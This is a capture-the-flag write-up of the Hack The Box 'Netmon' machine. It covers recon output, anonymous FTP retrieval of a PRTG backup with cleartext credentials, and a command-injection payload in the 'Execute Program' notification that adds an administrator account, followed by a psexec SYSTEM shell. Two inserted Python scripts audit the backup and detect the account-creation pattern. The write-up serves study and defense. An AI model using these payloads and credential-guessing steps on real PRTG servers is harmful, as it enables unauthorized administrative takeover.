HTB Netmon done
Netmon
TODO
FTP - anonymous
SMB
exploits:
- PRTG/18.1.37.13946
- Indy httpd 18.1.37.13946
OS:
Windows
Technology:
PRTG/18.1.37.13946
Indy httpd 18.1.37.13946
IP Address:
10.129.230.176
Open ports:
21/tcp open ftp Microsoft ftpd
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Users and pass:
From file: ./ProgramData/Paessler/PRTG Network Monitor/PRTG Configuration.old.bak
L: prtgadmin
P: PrTg@dmin2018
The backup is from 2018 and the password ends in a year, so only the last character has to change.
Correct password is: PrTg@dmin2019
---
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Netmon]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.232.196_nmap 10.129.232.196 ; cat 10.129.232.196_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-16 21:30 UTC
Nmap scan report for 10.129.232.196
Host is up (0.038s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_11-10-23 09:20AM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
ffuf: http://10.129.230.176/FUZZ
Rabbit hole
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Netmon]
└─$ ffuf -u http://10.129.230.176/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.230.176_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.230.176/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md
:: Output file : 10.129.230.176_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
favicon.ico [Status: 200, Size: 1150, Words: 4, Lines: 1, Duration: 85ms]
:: Progress: [143283/143283] :: Job [1/1] :: 362 req/sec :: Duration: [0:11:56] :: Errors: 0 ::
FTP: ftp://10.129.230.176
List folder: ./ProgramData/Paessler/PRTG Network Monitor
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Netmon]
└─$ ftp -A ftp://anonymous:<email-as-password>@10.129.230.176
Connected to 10.129.230.176.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
200 Type set to I.
ftp> ls -a
200 EPRT command successful.
125 Data connection already open; Transfer starting.
11-20-16 09:46PM <DIR> $RECYCLE.BIN
02-02-19 11:18PM 1024 .rnd
11-20-16 08:59PM 389408 bootmgr
07-16-16 08:10AM 1 BOOTNXT
02-03-19 07:05AM <DIR> Documents and Settings
02-25-19 09:15PM <DIR> inetpub
11-17-24 04:48PM 738197504 pagefile.sys
07-16-16 08:18AM <DIR> PerfLogs
02-25-19 09:56PM <DIR> Program Files
02-02-19 11:28PM <DIR> Program Files (x86)
12-15-21 09:40AM <DIR> ProgramData
02-03-19 07:05AM <DIR> Recovery
02-03-19 07:04AM <DIR> System Volume Information
02-03-19 07:08AM <DIR> Users
11-10-23 09:20AM <DIR> Windows
226 Transfer complete.
ftp> cd ProgramData
250 CWD command successful.
ftp> ls -a
200 EPRT command successful.
125 Data connection already open; Transfer starting.
02-03-19 07:05AM <DIR> Application Data
12-15-21 09:40AM <DIR> Corefig
02-03-19 07:05AM <DIR> Desktop
02-03-19 07:05AM <DIR> Documents
02-02-19 11:15PM <DIR> Licenses
11-20-16 09:36PM <DIR> Microsoft
02-02-19 11:18PM <DIR> Paessler
02-03-19 07:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 08:18AM <DIR> SoftwareDistribution
02-03-19 07:05AM <DIR> Start Menu
02-02-19 11:15PM <DIR> TEMP
02-03-19 07:05AM <DIR> Templates
11-20-16 09:19PM <DIR> USOPrivate
11-20-16 09:19PM <DIR> USOShared
02-25-19 09:56PM <DIR> VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> ls -a
200 EPRT command successful.
150 Opening ASCII mode data connection.
11-17-24 05:30PM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd PRTG\ Network\ Monitor
250 CWD command successful.
ftp> ls -a
200 EPRT command successful.
125 Data connection already open; Transfer starting.
11-17-24 05:31PM <DIR> Configuration Auto-Backups
11-17-24 04:59PM <DIR> Log Database
02-02-19 11:18PM <DIR> Logs (Debug)
02-02-19 11:18PM <DIR> Logs (Sensors)
02-02-19 11:18PM <DIR> Logs (System)
11-17-24 04:59PM <DIR> Logs (Web Server)
11-17-24 04:59PM <DIR> Monitoring Database
02-25-19 09:54PM 1189697 PRTG Configuration.dat
02-25-19 09:54PM 1189697 PRTG Configuration.old
07-14-18 02:13AM 1153755 PRTG Configuration.old.bak
11-17-24 05:30PM 1673127 PRTG Graph Data Cache.dat
02-25-19 10:00PM <DIR> Report PDFs
02-02-19 11:18PM <DIR> System Information Database
02-02-19 11:40PM <DIR> Ticket Database
02-02-19 11:18PM <DIR> ToDo Database
226 Transfer complete.
ftp> exit
221 Goodbye.
Download folder: ./ProgramData/Paessler/
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Netmon]
└─$ wget -r ftp://10.129.230.176/ProgramData/Paessler
--2024-11-17 22:35:43-- ftp://10.129.230.176/ProgramData/Paessler
=> ‘10.129.230.176/ProgramData/.listing’
Connecting to 10.129.230.176:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD (1) /ProgramData ... done.
==> PASV ... done. ==> LIST ... done.
10.129.230.176/ProgramData/.l [ <=> ] 774 --.-KB/s in 0s
==> PASV ... done. ==> LIST ... done.
10.129.230.176/ProgramData/.l [ <=> ] 518 --.-KB/s in 0s
==> PASV ... done. ==> LIST ... done.
10.129.230.176/ProgramData/.l [ <=> ] 774 --.-KB/s in 0s
2024-11-17 22:35:45 (354 MB/s) - ‘10.129.230.176/ProgramData/.listing’ saved [2066]
Removed ‘10.129.230.176/ProgramData/.listing’.
--2024-11-17 22:35:45-- ftp://10.129.230.176/ProgramData/Paessler/Paessler
=> ‘10.129.230.176/ProgramData/Paessler/.listing’
==> CWD (1) /ProgramData/Paessler ... done.
==> PASV ... done. ==> LIST ... done.
10.129.230.176/ProgramData/Pa [ <=> ] 61 --.-KB/s in 0.05s
2024-11-17 22:35:46 (1.09 KB/s) - ‘10.129.230.176/ProgramData/Paessler/.listing’ saved [61]
Removed ‘10.129.230.176/ProgramData/Paessler/.listing’.
--2024-11-17 22:35:46-- ftp://10.129.230.176/ProgramData/Paessler/PRTG%20Network%20Monitor/Paessler
=> ‘10.129.230.176/ProgramData/Paessler/PRTG Network Monitor/.listing’
==> CWD (1) /ProgramData/Paessler/PRTG Network Monitor ... done.
==> PASV ... done. ==> LIST ... done.
10.129.230.176/ProgramData/Pa [ <=> ] 889 --.-KB/s in 0s
2024-11-17 22:35:46 (3.15 MB/s) - ‘10.129.230.176/ProgramData/Paessler/PRTG Network Monitor/.listing’ saved [889]
Removed ‘10.129.230.176/ProgramData/Paessler/PRTG Network Monitor/.listing’.
--2024-11-17 22:35:46-- ftp://10.129.230.176/ProgramData/Paessler/PRTG%20Network%20Monitor/PRTG%20Configuration.dat
=> ‘10.129.230.176/ProgramData/Paessler/PRTG Network Monitor/PRTG Configuration.dat’
==> CWD not required.
==> PASV ... done. ==> RETR PRTG Configuration.dat ... done.
Length: 1189697 (1.1M)
Read config file: PRTG Configuration.old.bak
I found creds:
L: prtgadmin
P: PrTg@dmin2018
---
┌──(kali㉿kali)-[~/…/10.129.230.176/ProgramData/Paessler/PRTG Network Monitor]
└─$ cat PRTG\ Configuration.old.bak | grep -A2 User
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>
--
Email to all members of group PRTG Users Group
</name>
<ownerid>
--
User Groups
</name>
<ownerid>
--
PRTG Users Group
</name>
<ownerid>
--
Users
</name>
<ownerid>
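The grep above is enough to spot the credential by eye; for a repeatable check of a backup that has been exposed like this (it sat on an anonymous FTP share), an audit script that pulls every cleartext `<dbpassword>` entry and flags year-suffixed passwords is more useful, since the 2018 value was one character away from the live 2019 password. The following is an added example, not code from the write-up. Its sample text is constructed to mirror the three lines `grep -A2 User` surfaced (the `<!-- User: ... -->` comment, the password on the next line, then `</dbpassword>`); the surrounding element structure and the two extra accounts are assumptions, not content of the real file.

```python
"""Audit a PRTG configuration backup for cleartext credentials.

Added example, not code from the write-up. The sample text is constructed to
mirror the three lines that `grep -A2 User` surfaced from
PRTG Configuration.old.bak; the surrounding element structure and the
other two accounts are assumptions, not content from the real file.
"""
import re
from typing import Dict, List, Union

# Constructed sample in the shape the grep output showed.
SAMPLE_BACKUP = """<data>
  <dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
  </dbpassword>
  <dbpassword>
    <!-- User: svc_monitor -->
    Winter2017
  </dbpassword>
  <dbpassword>
    <!-- User: robot -->
    x7#Qv!pL2m@rT
  </dbpassword>
</data>
"""

# One <dbpassword> block: owner comment followed by the value in cleartext.
DBPASSWORD_RE = re.compile(
    r"<dbpassword>\s*<!--\s*User:\s*(?P<user>\S+?)\s*-->\s*"
    r"(?P<password>[^<\s]+)\s*</dbpassword>"
)
# "...2018"-style suffix: the year rotation that made the 2019 password
# guessable from the 2018 backup.
TRAILING_YEAR_RE = re.compile(r"(?:19|20)\d{2}$")


def mask(password: str) -> str:
    """Keep the first two characters so a finding is recognisable without
    copying the secret itself into a report."""
    return password[:2] + "*" * (len(password) - 2)


def find_cleartext_credentials(text: str) -> List[Dict[str, Union[str, int, bool]]]:
    """Return one finding per cleartext <dbpassword> entry in the backup."""
    findings: List[Dict[str, Union[str, int, bool]]] = []
    for m in DBPASSWORD_RE.finditer(text):
        pw = m.group("password")
        findings.append({
            "user": m.group("user"),
            "password_masked": mask(pw),
            "length": len(pw),
            "trailing_year": bool(TRAILING_YEAR_RE.search(pw)),
        })
    return findings


def report(text: str) -> List[str]:
    """Human-readable lines; the trailing-year flag is the thing to act on
    (rotate to an unrelated secret, not to next year's)."""
    lines = []
    for f in find_cleartext_credentials(text):
        note = " (year suffix: predictable rotation)" if f["trailing_year"] else ""
        lines.append(f'{f["user"]}: cleartext password {f["password_masked"]} '
                     f'({f["length"]} chars){note}')
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_BACKUP):
        print(line)
```

Run it against a real `PRTG Configuration.old.bak` by reading the file into `report()`; the regex is deliberately line-tolerant because these backups are not guaranteed to be well-formed XML.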
Privilege Escalation
Log in to the website as prtgadmin
Website: http://10.129.230.176/index.htm
L: prtgadmin
P: PrTg@dmin2019
Edit notification
Payload: aaa.txt ; net user hacker Qwerty123! /add ; net localgroup administrators hacker /add
---
Path:
Menu: Setup --> Account Settings --> Notifications --> Add new notification (right side)
Add the payload to "Execute Program"
Run the notification
Send a test notification (right side: small bell)
Log in as the new user with admin privileges
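From the defender's side, the notification step above leaves a clear trace: the PRTG service spawns a child process whose command line creates a local account and adds it to Administrators. The following is an added example, not code from the write-up, showing that detection run over constructed Sysmon Event ID 1 (process creation) records. The PRTG install directory, the server and probe process names, and the notification script name are assumptions.

```python
"""Flag account creation / local-admin changes spawned by PRTG.

Added example, not from the write-up. Events are constructed in the shape of
a Sysmon Event ID 1 (process creation) field subset. The PRTG install
directory, process names and the notification script name are assumptions.
"""
import re
from typing import Dict, List, Optional

PRTG_DIR = r"C:\Program Files (x86)\PRTG Network Monitor"  # assumed install path

# Constructed sample events.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # notification "Execute Program" parameter carrying the write-up's payload
        "ParentImage": PRTG_DIR + r"\PRTG Server.exe",  # assumed process name
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": (r'powershell.exe -File "' + PRTG_DIR + r'\Notifications\EXE\notify.ps1" '
                        r'aaa.txt ; net user hacker Qwerty123! /add ; '
                        r'net localgroup administrators hacker /add'),
        "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # interactive admin creating a service account: worth a look, not PRTG-related
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\net.exe",
        "CommandLine": r"net user svc_backup Str0ngPassw0rd /add",
        "User": r"NETMON\Administrator",
    },
    {   # ordinary sensor activity under PRTG: no alert
        "ParentImage": PRTG_DIR + r"\PRTG Probe.exe",  # assumed process name
        "Image": r"C:\Windows\System32\PING.EXE",
        "CommandLine": r"ping -n 1 10.129.0.1",
        "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # read-only "net user" query: no alert
        "ParentImage": PRTG_DIR + r"\PRTG Server.exe",
        "Image": r"C:\Windows\System32\net.exe",
        "CommandLine": r"net user prtgadmin",
        "User": r"NT AUTHORITY\SYSTEM",
    },
]

# net/net1 with or without .exe, account name, password, /add
USER_ADD_RE = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)
ADMIN_ADD_RE = re.compile(
    r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)
PRTG_PARENT_RE = re.compile(re.escape(PRTG_DIR), re.I)


def classify(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return an alert for an account or admin-group change, or None."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "")
    reasons: List[str] = []
    if USER_ADD_RE.search(cmd):
        reasons.append("local account creation")
    if ADMIN_ADD_RE.search(cmd):
        reasons.append("addition to local Administrators")
    if not reasons:
        return None
    # A monitoring service has no business creating accounts; anyone else doing
    # it is still a change-control question, so it stays a medium.
    severity = "high" if PRTG_PARENT_RE.search(parent) else "medium"
    return {"severity": severity, "reasons": reasons,
            "user": event.get("User", ""), "parent": parent, "command": cmd}


def detect(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over a batch of process-creation events."""
    return [a for a in (classify(e) for e in events) if a is not None]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(str(alert["severity"]).upper(), "|", ", ".join(alert["reasons"]),
              "|", alert["command"])
```

The high/medium split is the point: a `net user ... /add` under an interactive admin shell is routine enough to triage later, while the same command line under the PRTG service process is the signature of the notification abuse described in this section and should page someone.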
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Netmon]
└─$ psexec.py hacker:'Qwerty123!'@10.129.230.176
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.230.176.....
[*] Found writable share ADMIN$
[*] Uploading file agLDJbNY.exe
[*] Opening SVCManager on 10.129.230.176.....
[*] Creating service ZAyu on 10.129.230.176.....
[*] Starting service ZAyu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
Read flag: user.txt
C:\Windows\system32> cd C:\Users\Public\Desktop
C:\Users\Public\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 0EF5-E5E5
Directory of C:\Users\Public\Desktop
01/15/2024 10:03 AM <DIR> .
01/15/2024 10:03 AM <DIR> ..
02/02/2019 11:18 PM 1,195 PRTG Enterprise Console.lnk
02/02/2019 11:18 PM 1,160 PRTG Network Monitor.lnk
11/18/2024 07:37 AM 34 user.txt
3 File(s) 2,389 bytes
2 Dir(s) 6,732,279,808 bytes free
C:\Users\Public\Desktop> whoami ; ifconfig ; type user.txt
ERROR: Invalid argument/option - ';'.
Type "WHOAMI /?" for usage.
C:\Users\Public\Desktop> whoami
nt authority\system
C:\Users\Public\Desktop> ifconfig
'ifconfig' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\Public\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::e1e6:a83a:8b:6a90
Link-local IPv6 Address . . . . . : fe80::e1e6:a83a:8b:6a90%3
IPv4 Address. . . . . . . . . . . : 10.129.230.176
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7437%3
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb
C:\Users\Public\Desktop> type user.txt
effbeb76ea826a02563b59aeb2c52b24
Read flag: root.txt
C:\Users\Public\Desktop> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::e1e6:a83a:8b:6a90
Link-local IPv6 Address . . . . . : fe80::e1e6:a83a:8b:6a90%3
IPv4 Address. . . . . . . . . . . : 10.129.230.176
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7437%3
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb
C:\Users\Administrator\Desktop> type root.txt
cb1e681bf6d0988053f3b14a7df5b234
C:\Users\Administrator\Desktop>
References
[PRTG < 18.2.39 Command Injection Vulnerability](https://codewatch.org/2018/06/25/prtg-18-2-39-command-injection-vulnerability/)
Lessons Learned